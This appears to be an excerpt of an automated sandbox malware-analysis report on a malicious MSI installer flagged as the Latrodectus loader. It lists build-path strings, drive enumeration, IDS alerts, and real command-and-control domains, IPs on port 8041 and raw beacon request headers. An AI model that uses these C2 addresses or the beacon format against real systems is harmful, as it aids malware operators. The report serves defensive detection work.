                  Source: Binary string: C:\BUILD\work\b69487f8af4577da\BUILDSENG\Release\x64\ArPotEx64.pdb source: rundll32.exe, 00000006.00000002.3792001676.000000018005F000.00000002.00000001.01000000.00000005.sdmp, vierm_soft_x64.dll.2.dr
                  Source: Binary string: C:\JobRelease\win\Release\custact\x86\viewer.pdb: source: MSIA029.tmp, 00000004.00000002.1365857118.0000000000F77000.00000002.00000001.01000000.00000003.sdmp, MSIA029.tmp, 00000004.00000000.1352453561.0000000000F77000.00000002.00000001.01000000.00000003.sdmp, das.msi, 6a9d65.msi.2.dr, MSIA029.tmp.2.dr, MSI9F7C.tmp.2.dr
                  Source: Binary string: ntdll.pdb source: rundll32.exe, 00000006.00000003.1363899057.0000016AD27ED000.00000004.00000020.00020000.00000000.sdmp
                  Source: Binary string: kernel32.pdb source: rundll32.exe, 00000006.00000003.1368921552.0000016AD27E1000.00000004.00000020.00020000.00000000.sdmp
                  Source: Binary string: ntdll.pdbUGP source: rundll32.exe, 00000006.00000003.1363899057.0000016AD27ED000.00000004.00000020.00020000.00000000.sdmp
                  Source: Binary string: C:\JobRelease\win\Release\custact\x86\AICustAct.pdb source: das.msi, MSI9E30.tmp.2.dr, 6a9d65.msi.2.dr, MSI9F0E.tmp.2.dr, MSI9EEE.tmp.2.dr, MSI9EBE.tmp.2.dr
                  Source: Binary string: C:\JobRelease\win\Release\custact\x86\AICustAct.pdbn source: das.msi, MSI9E30.tmp.2.dr, 6a9d65.msi.2.dr, MSI9F0E.tmp.2.dr, MSI9EEE.tmp.2.dr, MSI9EBE.tmp.2.dr
                  Source: Binary string: C:\JobRelease\win\Release\custact\x86\viewer.pdb source: MSIA029.tmp, 00000004.00000002.1365857118.0000000000F77000.00000002.00000001.01000000.00000003.sdmp, MSIA029.tmp, 00000004.00000000.1352453561.0000000000F77000.00000002.00000001.01000000.00000003.sdmp, das.msi, 6a9d65.msi.2.dr, MSIA029.tmp.2.dr, MSI9F7C.tmp.2.dr
                  Source: Binary string: kernelbase.pdb source: rundll32.exe, 00000006.00000003.1364766656.0000016AD28E2000.00000004.00000020.00020000.00000000.sdmp
                  Source: C:\Windows\System32\msiexec.exeFile opened: z:Jump to behavior
                  Source: C:\Windows\System32\msiexec.exeFile opened: x:Jump to behavior
                  Source: C:\Windows\System32\msiexec.exeFile opened: v:Jump to behavior
                  Source: C:\Windows\System32\msiexec.exeFile opened: t:Jump to behavior
                  Source: C:\Windows\System32\msiexec.exeFile opened: r:Jump to behavior
                  Source: C:\Windows\System32\msiexec.exeFile opened: p:Jump to behavior
                  Source: C:\Windows\System32\msiexec.exeFile opened: n:Jump to behavior
                  Source: C:\Windows\System32\msiexec.exeFile opened: l:Jump to behavior
                  Source: C:\Windows\System32\msiexec.exeFile opened: j:Jump to behavior
                  Source: C:\Windows\System32\msiexec.exeFile opened: h:Jump to behavior
                  Source: C:\Windows\System32\msiexec.exeFile opened: f:Jump to behavior
                  Source: C:\Windows\System32\msiexec.exeFile opened: b:Jump to behavior
                  Source: C:\Windows\System32\msiexec.exeFile opened: y:Jump to behavior
                  Source: C:\Windows\System32\msiexec.exeFile opened: w:Jump to behavior
                  Source: C:\Windows\System32\msiexec.exeFile opened: u:Jump to behavior
                  Source: C:\Windows\System32\msiexec.exeFile opened: s:Jump to behavior
                  Source: C:\Windows\System32\msiexec.exeFile opened: q:Jump to behavior
                  Source: C:\Windows\System32\msiexec.exeFile opened: o:Jump to behavior
                  Source: C:\Windows\System32\msiexec.exeFile opened: m:Jump to behavior
                  Source: C:\Windows\System32\msiexec.exeFile opened: k:Jump to behavior
                  Source: C:\Windows\System32\msiexec.exeFile opened: i:Jump to behavior
                  Source: C:\Windows\System32\msiexec.exeFile opened: g:Jump to behavior
                  Source: C:\Windows\System32\msiexec.exeFile opened: e:Jump to behavior
                  Source: C:\Windows\System32\msiexec.exeFile opened: c:Jump to behavior
                  Source: C:\Windows\System32\msiexec.exeFile opened: a:Jump to behavior
                  Source: C:\Windows\Installer\MSIA029.tmpCode function: 4_2_00F6AF79 FindFirstFileExW,4_2_00F6AF79
                  Source: C:\Windows\explorer.exeCode function: 9_2_00F2A8E0 FindFirstFileW,FindNextFileW,LoadLibraryW,LoadLibraryExW,9_2_00F2A8E0
                  Source: C:\Windows\explorer.exeCode function: 9_2_00F22B28 FindFirstFileA,wsprintfA,FindNextFileA,FindClose,9_2_00F22B28

                  Networking

                  barindex
                  Suricata IDS alerts for network traffic
                  Source: Network trafficSuricata IDS: 2048735 - Severity 1 - ET MALWARE Latrodectus Loader Related Activity (POST) : 192.168.2.7:62255 -> 188.114.97.3:443
                  Source: Network trafficSuricata IDS: 2048735 - Severity 1 - ET MALWARE Latrodectus Loader Related Activity (POST) : 192.168.2.7:62259 -> 188.114.97.3:443
                  Source: Network trafficSuricata IDS: 2048735 - Severity 1 - ET MALWARE Latrodectus Loader Related Activity (POST) : 192.168.2.7:62261 -> 188.114.97.3:443
                  Source: Network trafficSuricata IDS: 2048735 - Severity 1 - ET MALWARE Latrodectus Loader Related Activity (POST) : 192.168.2.7:62271 -> 188.114.97.3:443
                  Source: Network trafficSuricata IDS: 2048735 - Severity 1 - ET MALWARE Latrodectus Loader Related Activity (POST) : 192.168.2.7:62291 -> 188.114.97.3:443
                  Source: Network trafficSuricata IDS: 2048735 - Severity 1 - ET MALWARE Latrodectus Loader Related Activity (POST) : 192.168.2.7:62341 -> 188.114.97.3:443
                  Source: Network trafficSuricata IDS: 2048735 - Severity 1 - ET MALWARE Latrodectus Loader Related Activity (POST) : 192.168.2.7:62306 -> 188.114.97.3:443
                  Source: Network trafficSuricata IDS: 2048735 - Severity 1 - ET MALWARE Latrodectus Loader Related Activity (POST) : 192.168.2.7:62334 -> 188.114.97.3:443
                  Source: Network trafficSuricata IDS: 2048735 - Severity 1 - ET MALWARE Latrodectus Loader Related Activity (POST) : 192.168.2.7:62273 -> 188.114.97.3:443
                  Source: Network trafficSuricata IDS: 2048735 - Severity 1 - ET MALWARE Latrodectus Loader Related Activity (POST) : 192.168.2.7:62258 -> 188.114.97.3:443
                  Source: Network trafficSuricata IDS: 2048735 - Severity 1 - ET MALWARE Latrodectus Loader Related Activity (POST) : 192.168.2.7:62371 -> 188.114.97.3:443
                  Source: Network trafficSuricata IDS: 2048735 - Severity 1 - ET MALWARE Latrodectus Loader Related Activity (POST) : 192.168.2.7:62257 -> 188.114.97.3:443
                  Source: Network trafficSuricata IDS: 2048735 - Severity 1 - ET MALWARE Latrodectus Loader Related Activity (POST) : 192.168.2.7:62396 -> 188.114.97.3:443
                  Source: Network trafficSuricata IDS: 2048735 - Severity 1 - ET MALWARE Latrodectus Loader Related Activity (POST) : 192.168.2.7:62282 -> 188.114.97.3:443
                  Source: Network trafficSuricata IDS: 2048735 - Severity 1 - ET MALWARE Latrodectus Loader Related Activity (POST) : 192.168.2.7:62353 -> 188.114.97.3:443
                  Source: Network trafficSuricata IDS: 2048735 - Severity 1 - ET MALWARE Latrodectus Loader Related Activity (POST) : 192.168.2.7:62267 -> 188.114.97.3:443
                  Source: Network trafficSuricata IDS: 2048735 - Severity 1 - ET MALWARE Latrodectus Loader Related Activity (POST) : 192.168.2.7:62338 -> 188.114.97.3:443
                  Source: Network trafficSuricata IDS: 2048735 - Severity 1 - ET MALWARE Latrodectus Loader Related Activity (POST) : 192.168.2.7:62321 -> 188.114.97.3:443
                  Source: Network trafficSuricata IDS: 2048735 - Severity 1 - ET MALWARE Latrodectus Loader Related Activity (POST) : 192.168.2.7:62332 -> 188.114.97.3:443
                  Source: Network trafficSuricata IDS: 2048735 - Severity 1 - ET MALWARE Latrodectus Loader Related Activity (POST) : 192.168.2.7:62284 -> 188.114.97.3:443
                  Source: Network trafficSuricata IDS: 2048735 - Severity 1 - ET MALWARE Latrodectus Loader Related Activity (POST) : 192.168.2.7:62315 -> 188.114.97.3:443
                  Source: Network trafficSuricata IDS: 2048735 - Severity 1 - ET MALWARE Latrodectus Loader Related Activity (POST) : 192.168.2.7:62274 -> 188.114.97.3:443
                  Source: Network trafficSuricata IDS: 2048735 - Severity 1 - ET MALWARE Latrodectus Loader Related Activity (POST) : 192.168.2.7:62362 -> 188.114.97.3:443
                  Source: Network trafficSuricata IDS: 2048735 - Severity 1 - ET MALWARE Latrodectus Loader Related Activity (POST) : 192.168.2.7:62402 -> 188.114.97.3:443
                  Source: Network trafficSuricata IDS: 2048735 - Severity 1 - ET MALWARE Latrodectus Loader Related Activity (POST) : 192.168.2.7:62344 -> 188.114.97.3:443
                  Source: Network trafficSuricata IDS: 2048735 - Severity 1 - ET MALWARE Latrodectus Loader Related Activity (POST) : 192.168.2.7:62393 -> 188.114.97.3:443
                  Source: Network trafficSuricata IDS: 2048735 - Severity 1 - ET MALWARE Latrodectus Loader Related Activity (POST) : 192.168.2.7:62380 -> 188.114.97.3:443
                  Source: Network trafficSuricata IDS: 2048735 - Severity 1 - ET MALWARE Latrodectus Loader Related Activity (POST) : 192.168.2.7:62356 -> 188.114.97.3:443
                  Source: Network trafficSuricata IDS: 2048735 - Severity 1 - ET MALWARE Latrodectus Loader Related Activity (POST) : 192.168.2.7:62304 -> 188.114.97.3:443
                  Source: Network trafficSuricata IDS: 2048735 - Severity 1 - ET MALWARE Latrodectus Loader Related Activity (POST) : 192.168.2.7:62263 -> 188.114.97.3:443
                  Source: Network trafficSuricata IDS: 2048735 - Severity 1 - ET MALWARE Latrodectus Loader Related Activity (POST) : 192.168.2.7:62347 -> 188.114.97.3:443
                  Source: Network trafficSuricata IDS: 2048735 - Severity 1 - ET MALWARE Latrodectus Loader Related Activity (POST) : 192.168.2.7:62279 -> 188.114.97.3:443
                  Source: Network trafficSuricata IDS: 2048735 - Severity 1 - ET MALWARE Latrodectus Loader Related Activity (POST) : 192.168.2.7:62293 -> 188.114.97.3:443
                  Source: Network trafficSuricata IDS: 2048735 - Severity 1 - ET MALWARE Latrodectus Loader Related Activity (POST) : 192.168.2.7:62308 -> 188.114.97.3:443
                  Source: Network trafficSuricata IDS: 2048735 - Severity 1 - ET MALWARE Latrodectus Loader Related Activity (POST) : 192.168.2.7:62326 -> 188.114.97.3:443
                  Source: Network trafficSuricata IDS: 2048735 - Severity 1 - ET MALWARE Latrodectus Loader Related Activity (POST) : 192.168.2.7:62383 -> 188.114.97.3:443
                  Source: Network trafficSuricata IDS: 2048735 - Severity 1 - ET MALWARE Latrodectus Loader Related Activity (POST) : 192.168.2.7:62278 -> 188.114.97.3:443
                  Source: Network trafficSuricata IDS: 2048735 - Severity 1 - ET MALWARE Latrodectus Loader Related Activity (POST) : 192.168.2.7:62286 -> 188.114.97.3:443
                  Source: Network trafficSuricata IDS: 2048735 - Severity 1 - ET MALWARE Latrodectus Loader Related Activity (POST) : 192.168.2.7:62420 -> 188.114.97.3:443
                  Source: Network trafficSuricata IDS: 2048735 - Severity 1 - ET MALWARE Latrodectus Loader Related Activity (POST) : 192.168.2.7:62272 -> 188.114.97.3:443
                  Source: Network trafficSuricata IDS: 2048735 - Severity 1 - ET MALWARE Latrodectus Loader Related Activity (POST) : 192.168.2.7:62354 -> 188.114.97.3:443
                  Source: Network trafficSuricata IDS: 2048735 - Severity 1 - ET MALWARE Latrodectus Loader Related Activity (POST) : 192.168.2.7:62297 -> 188.114.97.3:443
                  Source: Network trafficSuricata IDS: 2048735 - Severity 1 - ET MALWARE Latrodectus Loader Related Activity (POST) : 192.168.2.7:62296 -> 188.114.97.3:443
                  Source: Network trafficSuricata IDS: 2048735 - Severity 1 - ET MALWARE Latrodectus Loader Related Activity (POST) : 192.168.2.7:62323 -> 188.114.97.3:443
                  Source: Network trafficSuricata IDS: 2048735 - Severity 1 - ET MALWARE Latrodectus Loader Related Activity (POST) : 192.168.2.7:62404 -> 188.114.97.3:443
                  Source: Network trafficSuricata IDS: 2048735 - Severity 1 - ET MALWARE Latrodectus Loader Related Activity (POST) : 192.168.2.7:62365 -> 188.114.97.3:443
                  Source: Network trafficSuricata IDS: 2048735 - Severity 1 - ET MALWARE Latrodectus Loader Related Activity (POST) : 192.168.2.7:62401 -> 188.114.97.3:443
                  Source: Network trafficSuricata IDS: 2048735 - Severity 1 - ET MALWARE Latrodectus Loader Related Activity (POST) : 192.168.2.7:62414 -> 188.114.97.3:443
                  Source: Network trafficSuricata IDS: 2048735 - Severity 1 - ET MALWARE Latrodectus Loader Related Activity (POST) : 192.168.2.7:62351 -> 188.114.97.3:443
                  Source: Network trafficSuricata IDS: 2048735 - Severity 1 - ET MALWARE Latrodectus Loader Related Activity (POST) : 192.168.2.7:62331 -> 188.114.97.3:443
                  Source: Network trafficSuricata IDS: 2048735 - Severity 1 - ET MALWARE Latrodectus Loader Related Activity (POST) : 192.168.2.7:62372 -> 188.114.97.3:443
                  Source: Network trafficSuricata IDS: 2048735 - Severity 1 - ET MALWARE Latrodectus Loader Related Activity (POST) : 192.168.2.7:62270 -> 188.114.97.3:443
                  Source: Network trafficSuricata IDS: 2048735 - Severity 1 - ET MALWARE Latrodectus Loader Related Activity (POST) : 192.168.2.7:62416 -> 188.114.97.3:443
                  Source: Network trafficSuricata IDS: 2048735 - Severity 1 - ET MALWARE Latrodectus Loader Related Activity (POST) : 192.168.2.7:62307 -> 188.114.97.3:443
                  Source: Network trafficSuricata IDS: 2048735 - Severity 1 - ET MALWARE Latrodectus Loader Related Activity (POST) : 192.168.2.7:62290 -> 188.114.97.3:443
                  Source: Network trafficSuricata IDS: 2048735 - Severity 1 - ET MALWARE Latrodectus Loader Related Activity (POST) : 192.168.2.7:62318 -> 188.114.97.3:443
                  Source: Network trafficSuricata IDS: 2048735 - Severity 1 - ET MALWARE Latrodectus Loader Related Activity (POST) : 192.168.2.7:62265 -> 188.114.97.3:443
                  Source: Network trafficSuricata IDS: 2048735 - Severity 1 - ET MALWARE Latrodectus Loader Related Activity (POST) : 192.168.2.7:62366 -> 188.114.97.3:443
                  Source: Network trafficSuricata IDS: 2048735 - Severity 1 - ET MALWARE Latrodectus Loader Related Activity (POST) : 192.168.2.7:62357 -> 188.114.97.3:443
                  Source: Network trafficSuricata IDS: 2048735 - Severity 1 - ET MALWARE Latrodectus Loader Related Activity (POST) : 192.168.2.7:62339 -> 188.114.97.3:443
                  Source: Network trafficSuricata IDS: 2048735 - Severity 1 - ET MALWARE Latrodectus Loader Related Activity (POST) : 192.168.2.7:62276 -> 188.114.97.3:443
                  Source: Network trafficSuricata IDS: 2048735 - Severity 1 - ET MALWARE Latrodectus Loader Related Activity (POST) : 192.168.2.7:62337 -> 188.114.97.3:443
                  Source: Network trafficSuricata IDS: 2048735 - Severity 1 - ET MALWARE Latrodectus Loader Related Activity (POST) : 192.168.2.7:62340 -> 188.114.97.3:443
                  Source: Network trafficSuricata IDS: 2048735 - Severity 1 - ET MALWARE Latrodectus Loader Related Activity (POST) : 192.168.2.7:62320 -> 188.114.97.3:443
                  Source: Network trafficSuricata IDS: 2048735 - Severity 1 - ET MALWARE Latrodectus Loader Related Activity (POST) : 192.168.2.7:62359 -> 188.114.97.3:443
                  Source: Network trafficSuricata IDS: 2048735 - Severity 1 - ET MALWARE Latrodectus Loader Related Activity (POST) : 192.168.2.7:62368 -> 188.114.97.3:443
                  Source: Network trafficSuricata IDS: 2048735 - Severity 1 - ET MALWARE Latrodectus Loader Related Activity (POST) : 192.168.2.7:62310 -> 188.114.97.3:443
                  Source: Network trafficSuricata IDS: 2048735 - Severity 1 - ET MALWARE Latrodectus Loader Related Activity (POST) : 192.168.2.7:62391 -> 188.114.97.3:443
                  Source: Network trafficSuricata IDS: 2048735 - Severity 1 - ET MALWARE Latrodectus Loader Related Activity (POST) : 192.168.2.7:62348 -> 188.114.97.3:443
                  Source: Network trafficSuricata IDS: 2048735 - Severity 1 - ET MALWARE Latrodectus Loader Related Activity (POST) : 192.168.2.7:62389 -> 188.114.97.3:443
                  Source: Network trafficSuricata IDS: 2048735 - Severity 1 - ET MALWARE Latrodectus Loader Related Activity (POST) : 192.168.2.7:62395 -> 188.114.97.3:443
                  Source: Network trafficSuricata IDS: 2048735 - Severity 1 - ET MALWARE Latrodectus Loader Related Activity (POST) : 192.168.2.7:62314 -> 188.114.97.3:443
                  Source: Network trafficSuricata IDS: 2048735 - Severity 1 - ET MALWARE Latrodectus Loader Related Activity (POST) : 192.168.2.7:62300 -> 188.114.97.3:443
                  Source: Network trafficSuricata IDS: 2048735 - Severity 1 - ET MALWARE Latrodectus Loader Related Activity (POST) : 192.168.2.7:62289 -> 188.114.97.3:443
                  Source: Network trafficSuricata IDS: 2048735 - Severity 1 - ET MALWARE Latrodectus Loader Related Activity (POST) : 192.168.2.7:62373 -> 188.114.97.3:443
                  Source: Network trafficSuricata IDS: 2048735 - Severity 1 - ET MALWARE Latrodectus Loader Related Activity (POST) : 192.168.2.7:62358 -> 188.114.97.3:443
                  Source: Network trafficSuricata IDS: 2048735 - Severity 1 - ET MALWARE Latrodectus Loader Related Activity (POST) : 192.168.2.7:62375 -> 188.114.97.3:443
                  Source: Network trafficSuricata IDS: 2048735 - Severity 1 - ET MALWARE Latrodectus Loader Related Activity (POST) : 192.168.2.7:62399 -> 188.114.97.3:443
                  Source: Network trafficSuricata IDS: 2048735 - Severity 1 - ET MALWARE Latrodectus Loader Related Activity (POST) : 192.168.2.7:62379 -> 188.114.97.3:443
                  Source: Network trafficSuricata IDS: 2048735 - Severity 1 - ET MALWARE Latrodectus Loader Related Activity (POST) : 192.168.2.7:62407 -> 188.114.97.3:443
                  Source: Network trafficSuricata IDS: 2048735 - Severity 1 - ET MALWARE Latrodectus Loader Related Activity (POST) : 192.168.2.7:62364 -> 188.114.97.3:443
                  Source: Network trafficSuricata IDS: 2048735 - Severity 1 - ET MALWARE Latrodectus Loader Related Activity (POST) : 192.168.2.7:62417 -> 188.114.97.3:443
                  Source: Network trafficSuricata IDS: 2048735 - Severity 1 - ET MALWARE Latrodectus Loader Related Activity (POST) : 192.168.2.7:62381 -> 188.114.97.3:443
                  Source: Network trafficSuricata IDS: 2048735 - Severity 1 - ET MALWARE Latrodectus Loader Related Activity (POST) : 192.168.2.7:62313 -> 188.114.97.3:443
                  Source: Network trafficSuricata IDS: 2048735 - Severity 1 - ET MALWARE Latrodectus Loader Related Activity (POST) : 192.168.2.7:62329 -> 188.114.97.3:443
                  Source: Network trafficSuricata IDS: 2048735 - Severity 1 - ET MALWARE Latrodectus Loader Related Activity (POST) : 192.168.2.7:62346 -> 188.114.97.3:443
                  Source: Network trafficSuricata IDS: 2048735 - Severity 1 - ET MALWARE Latrodectus Loader Related Activity (POST) : 192.168.2.7:62412 -> 188.114.97.3:443
                  Source: Network trafficSuricata IDS: 2048735 - Severity 1 - ET MALWARE Latrodectus Loader Related Activity (POST) : 192.168.2.7:62410 -> 188.114.97.3:443
                  Source: Network trafficSuricata IDS: 2048735 - Severity 1 - ET MALWARE Latrodectus Loader Related Activity (POST) : 192.168.2.7:62394 -> 188.114.97.3:443
                  Source: Network trafficSuricata IDS: 2048735 - Severity 1 - ET MALWARE Latrodectus Loader Related Activity (POST) : 192.168.2.7:62408 -> 188.114.97.3:443
                  Source: Network trafficSuricata IDS: 2048735 - Severity 1 - ET MALWARE Latrodectus Loader Related Activity (POST) : 192.168.2.7:62409 -> 188.114.97.3:443
                  Source: Network trafficSuricata IDS: 2048735 - Severity 1 - ET MALWARE Latrodectus Loader Related Activity (POST) : 192.168.2.7:62377 -> 188.114.97.3:443
                  Source: Network trafficSuricata IDS: 2048735 - Severity 1 - ET MALWARE Latrodectus Loader Related Activity (POST) : 192.168.2.7:62386 -> 188.114.97.3:443
                  Source: Network trafficSuricata IDS: 2048735 - Severity 1 - ET MALWARE Latrodectus Loader Related Activity (POST) : 192.168.2.7:62387 -> 188.114.97.3:443
                  System process connects to network (likely due to code injection or exploit)
                  Source: C:\Windows\System32\rundll32.exeNetwork Connect: 82.115.223.39 8041Jump to behavior
                  Source: C:\Windows\explorer.exeNetwork Connect: 188.114.97.3 443Jump to behavior
                  Source: C:\Windows\System32\rundll32.exeNetwork Connect: 80.78.24.30 8041Jump to behavior
                  C2 URLs / IPs found in malware configuration
                  Source: Malware configuration extractorURLs: https://isomicrotich.com/test/
                  Source: Malware configuration extractorURLs: https://opewolumeras.com/test/
                  Uses known network protocols on non-standard ports
                  Source: unknownNetwork traffic detected: HTTP traffic on port 8041 -> 49701
                  Source: unknownNetwork traffic detected: HTTP traffic on port 8041 -> 49702
                  Source: unknownNetwork traffic detected: HTTP traffic on port 8041 -> 49704
                  Source: unknownNetwork traffic detected: HTTP traffic on port 8041 -> 49705
                  Source: unknownNetwork traffic detected: HTTP traffic on port 8041 -> 49710
                  Source: unknownNetwork traffic detected: HTTP traffic on port 8041 -> 49712
                  Source: unknownNetwork traffic detected: HTTP traffic on port 8041 -> 49715
                  Source: unknownNetwork traffic detected: HTTP traffic on port 8041 -> 63790
                  Source: unknownNetwork traffic detected: HTTP traffic on port 8041 -> 63792
                  Source: unknownNetwork traffic detected: HTTP traffic on port 8041 -> 63793
                  Source: unknownNetwork traffic detected: HTTP traffic on port 8041 -> 63795
                  Source: unknownNetwork traffic detected: HTTP traffic on port 8041 -> 63796
                  Source: unknownNetwork traffic detected: HTTP traffic on port 8041 -> 57452
                  Source: unknownNetwork traffic detected: HTTP traffic on port 8041 -> 57453
                  Source: unknownNetwork traffic detected: HTTP traffic on port 8041 -> 57455
                  Source: unknownNetwork traffic detected: HTTP traffic on port 8041 -> 57456
                  Source: unknownNetwork traffic detected: HTTP traffic on port 8041 -> 57456
                  Source: unknownNetwork traffic detected: HTTP traffic on port 8041 -> 62209
                  Source: unknownNetwork traffic detected: HTTP traffic on port 8041 -> 62210
                  Source: unknownNetwork traffic detected: HTTP traffic on port 8041 -> 62212
                  Source: unknownNetwork traffic detected: HTTP traffic on port 8041 -> 62213
                  Source: unknownNetwork traffic detected: HTTP traffic on port 8041 -> 62213
                  Source: unknownNetwork traffic detected: HTTP traffic on port 8041 -> 62213
                  Source: unknownNetwork traffic detected: HTTP traffic on port 8041 -> 62215
                  Source: unknownNetwork traffic detected: HTTP traffic on port 8041 -> 62216
                  Source: unknownNetwork traffic detected: HTTP traffic on port 8041 -> 62218
                  Source: unknownNetwork traffic detected: HTTP traffic on port 8041 -> 62219
                  Source: unknownNetwork traffic detected: HTTP traffic on port 8041 -> 62222
                  Source: unknownNetwork traffic detected: HTTP traffic on port 8041 -> 62223
                  Source: unknownNetwork traffic detected: HTTP traffic on port 8041 -> 62225
                  Source: unknownNetwork traffic detected: HTTP traffic on port 8041 -> 62226
                  Source: unknownNetwork traffic detected: HTTP traffic on port 8041 -> 62228
                  Source: unknownNetwork traffic detected: HTTP traffic on port 8041 -> 62229
                  Source: unknownNetwork traffic detected: HTTP traffic on port 8041 -> 62233
                  Source: unknownNetwork traffic detected: HTTP traffic on port 8041 -> 62234
                  Source: unknownNetwork traffic detected: HTTP traffic on port 8041 -> 62236
                  Source: unknownNetwork traffic detected: HTTP traffic on port 8041 -> 62237
                  Source: unknownNetwork traffic detected: HTTP traffic on port 8041 -> 62239
                  Source: unknownNetwork traffic detected: HTTP traffic on port 8041 -> 62240
                  Source: unknownNetwork traffic detected: HTTP traffic on port 8041 -> 62242
                  Source: unknownNetwork traffic detected: HTTP traffic on port 8041 -> 62243
                  Source: unknownNetwork traffic detected: HTTP traffic on port 8041 -> 62245
                  Source: unknownNetwork traffic detected: HTTP traffic on port 8041 -> 62246
                  Source: unknownNetwork traffic detected: HTTP traffic on port 8041 -> 62249
                  Source: unknownNetwork traffic detected: HTTP traffic on port 8041 -> 62250
                  Source: unknownNetwork traffic detected: HTTP traffic on port 8041 -> 62253
                  Source: unknownNetwork traffic detected: HTTP traffic on port 8041 -> 62254
                  Source: unknownNetwork traffic detected: HTTP traffic on port 8041 -> 62260
                  Source: unknownNetwork traffic detected: HTTP traffic on port 8041 -> 62262
                  Source: unknownNetwork traffic detected: HTTP traffic on port 8041 -> 62266
                  Source: unknownNetwork traffic detected: HTTP traffic on port 8041 -> 62268
                  Source: unknownNetwork traffic detected: HTTP traffic on port 8041 -> 62280
                  Source: unknownNetwork traffic detected: HTTP traffic on port 8041 -> 62281
                  Source: unknownNetwork traffic detected: HTTP traffic on port 8041 -> 62285
                  Source: unknownNetwork traffic detected: HTTP traffic on port 8041 -> 62287
                  Source: unknownNetwork traffic detected: HTTP traffic on port 8041 -> 62292
                  Source: unknownNetwork traffic detected: HTTP traffic on port 8041 -> 62292
                  Source: unknownNetwork traffic detected: HTTP traffic on port 8041 -> 62292
                  Source: unknownNetwork traffic detected: HTTP traffic on port 8041 -> 62294
                  Source: unknownNetwork traffic detected: HTTP traffic on port 8041 -> 62298
                  Source: unknownNetwork traffic detected: HTTP traffic on port 8041 -> 62299
                  Source: unknownNetwork traffic detected: HTTP traffic on port 8041 -> 62302
                  Source: unknownNetwork traffic detected: HTTP traffic on port 8041 -> 62303
                  Source: unknownNetwork traffic detected: HTTP traffic on port 8041 -> 62309
                  Source: unknownNetwork traffic detected: HTTP traffic on port 8041 -> 62311
                  Source: unknownNetwork traffic detected: HTTP traffic on port 8041 -> 62316
                  Source: unknownNetwork traffic detected: HTTP traffic on port 8041 -> 62317
                  Source: unknownNetwork traffic detected: HTTP traffic on port 8041 -> 62322
                  Source: unknownNetwork traffic detected: HTTP traffic on port 8041 -> 62324
                  Source: unknownNetwork traffic detected: HTTP traffic on port 8041 -> 62327
                  Source: unknownNetwork traffic detected: HTTP traffic on port 8041 -> 62328
                  Source: unknownNetwork traffic detected: HTTP traffic on port 8041 -> 62333
                  Source: unknownNetwork traffic detected: HTTP traffic on port 8041 -> 62335
                  Source: unknownNetwork traffic detected: HTTP traffic on port 8041 -> 62342
                  Source: unknownNetwork traffic detected: HTTP traffic on port 8041 -> 62343
                  Source: unknownNetwork traffic detected: HTTP traffic on port 8041 -> 62360
                  Source: unknownNetwork traffic detected: HTTP traffic on port 8041 -> 62361
                  Source: unknownNetwork traffic detected: HTTP traffic on port 8041 -> 62367
                  Source: unknownNetwork traffic detected: HTTP traffic on port 8041 -> 62369
                  Source: unknownNetwork traffic detected: HTTP traffic on port 8041 -> 62374
                  Source: unknownNetwork traffic detected: HTTP traffic on port 8041 -> 62376
                  Source: unknownNetwork traffic detected: HTTP traffic on port 8041 -> 62382
                  Source: unknownNetwork traffic detected: HTTP traffic on port 8041 -> 62384
                  Source: unknownNetwork traffic detected: HTTP traffic on port 8041 -> 62388
                  Source: unknownNetwork traffic detected: HTTP traffic on port 8041 -> 62390
                  Source: unknownNetwork traffic detected: HTTP traffic on port 8041 -> 62397
                  Source: unknownNetwork traffic detected: HTTP traffic on port 8041 -> 62398
                  Source: unknownNetwork traffic detected: HTTP traffic on port 8041 -> 62403
                  Source: unknownNetwork traffic detected: HTTP traffic on port 8041 -> 62405
                  Source: unknownNetwork traffic detected: HTTP traffic on port 8041 -> 62411
                  Source: unknownNetwork traffic detected: HTTP traffic on port 8041 -> 62413
                  Source: unknownNetwork traffic detected: HTTP traffic on port 8041 -> 62418
                  Source: unknownNetwork traffic detected: HTTP traffic on port 8041 -> 62419
                  Source: global trafficTCP traffic: 192.168.2.7:49701 -> 80.78.24.30:8041
                  Source: global trafficTCP traffic: 192.168.2.7:57458 -> 82.115.223.39:8041
                  Source: Joe Sandbox ViewIP Address: 188.114.97.3 188.114.97.3
                  Source: Joe Sandbox ViewIP Address: 188.114.97.3 188.114.97.3
                  Source: Joe Sandbox ViewIP Address: 82.115.223.39 82.115.223.39
                  Source: Joe Sandbox ViewIP Address: 80.78.24.30 80.78.24.30
                  Source: Joe Sandbox ViewASN Name: CLOUDFLARENETUS CLOUDFLARENETUS
                  Source: Joe Sandbox ViewASN Name: MIDNET-ASTK-TelecomRU MIDNET-ASTK-TelecomRU
                  Source: Joe Sandbox ViewASN Name: CYBERDYNELR CYBERDYNELR
                  Source: Joe Sandbox ViewJA3 fingerprint: a0e9f5d64349fb13191bc781f81f42e1
                  Source: global trafficHTTP traffic detected: POST /test/ HTTP/1.1Accept: */*Content-Type: application/x-www-form-urlencodedCookie: kALB+jBIcqFh9baN0mUbkry70/OBhj4SPyJDpuAd5YZutJOgRAJdrjzrUX44N6GpDsu9dmntVXFHGxw5Mv+gazRt6m8J8V5HhO+mYsr4QtqBIt9nDnI3D7sEB1NNQMN7SzlVtYg37mRsfDlmYQ4rnkWH3kVw/phmmhE/2u9KGlZ8s8sR9dhipdU=User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Tob 1.1)Host: isomicrotich.comContent-Length: 92Cache-Control: no-cache
                  Source: global trafficHTTP traffic detected: POST /test/ HTTP/1.1Accept: */*Content-Type: application/x-www-form-urlencodedCookie: kALB+jBIcqFg9baN0mUbkry70/OBhj4SPyJDpuAd5YZutJOgRAJdrjzrUX44N6GpDsu9dmntVXFHGxw5Mv+gazRt6m8J8V5HhO+mYsr4QtqBIt9nDnI3D7sEB1NNQMN7SzlVtYg37mRsfDlmYQ4rnkWH3kVw/phmmhE/2u9KGlZ8s8sR9dhipdU=User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Tob 1.1)Host: isomicrotich.comContent-Length: 0Cache-Control: no-cache
